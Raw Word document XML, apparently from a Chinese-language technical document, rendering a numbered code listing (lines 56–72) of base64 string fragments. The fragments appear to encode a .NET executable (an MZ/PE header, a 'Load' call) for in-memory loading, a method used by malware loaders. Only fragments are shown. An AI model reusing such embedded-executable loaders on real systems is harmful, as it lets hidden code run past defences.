        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dy"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAID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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACi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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>oT"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEg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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAACh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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ME"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9Ag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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QC"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:990;width:9110;height:550" coordorigin="1430,990" coordsize="9110,550" path="m1440,1000l1440,1000,1440,1000,1440,1000,1441,1000,1441,1000,1441,1000,1442,1000,1442,1000,1443,1000,1444,1000,1446,1000,1448,1000,1450,1000,1452,1000,1455,1000,1459,1000,1463,1000,1467,1000,1472,1000,1477,1000,1484,1000,1490,1000,1498,1000,1506,1000,1515,1000,1525,1000,1535,1000,1547,1000,1559,1000,1572,1000,1586,1000,1601,1000,1617,1000,1635,1000,1653,1000,1672,1000,1692,1000,1714,1000,1737,1000,1761,1000,1786,1000,1813,1000,1841,1000,1870,1000,1901,1000,1933,1000,1966,1000,2001,1000,2038,1000,2076,1000,2116,1000,2157,1000,2200,1000,2245,1000,2291,1000,2339,1000,2389,1000,2441,1000,2494,1000,2550,1000,2607,1000,2667,1000,2728,1000,2791,1000,2856,1000,2924,1000,2993,1000,3065,1000,3139,1000,3215,1000,3293,1000,3374,1000,3457,1000,3542,1000,3629,1000,3719,1000,3812,1000,3907,1000,4004,1000,4104,1000,4206,1000,4311,1000,4419,1000,4529,1000,4642,1000,4758,1000,4876,1000,4998,1000,5122,1000,5249,1000,5378,1000,5511,1000,5647,1000,5785,1000,5927,1000,6072,1000,6220,1000,6371,1000,6525,1000,6682,1000,6842,1000,7006,1000,7173,1000,7343,1000,7517,1000,7694,1000,7874,1000,8058,1000,8245,1000,8436,1000,8630,1000,8828,1000,9030,1000,9235,1000,9444,1000,9656,1000,9872,1000,10092,1000,10316,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,10543,1416,10543,1428,10543,1440,10543,1452,10543,1464,10543,1477,10543,1490,10543,1503,10543,1516,10543,1529,10543,1543,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10542,1557,10542,1557,10541,1557,10540,1557,10538,1557,10536,1557,10534,1557,10532,1557,10529,1557,10525,1557,10521,1557,10517,1557,10512,1557,10506,1557,10500,1557,10493,1557,10486,1557,10478,1557,10469,1557,10459,1557,10449,1557,10437,1557,10425,1557,10412,1557,10398,1557,10383,1557,10366,1557,10349,1557,10331,1557,10312,1557,10291,1557,10270,1557,10247,1557,10223,1557,10198,1557,10171,1557,10143,1557,10114,1557,10083,1557,10051,1557,10018,1557,9983,1557,9946,1557,9908,1557,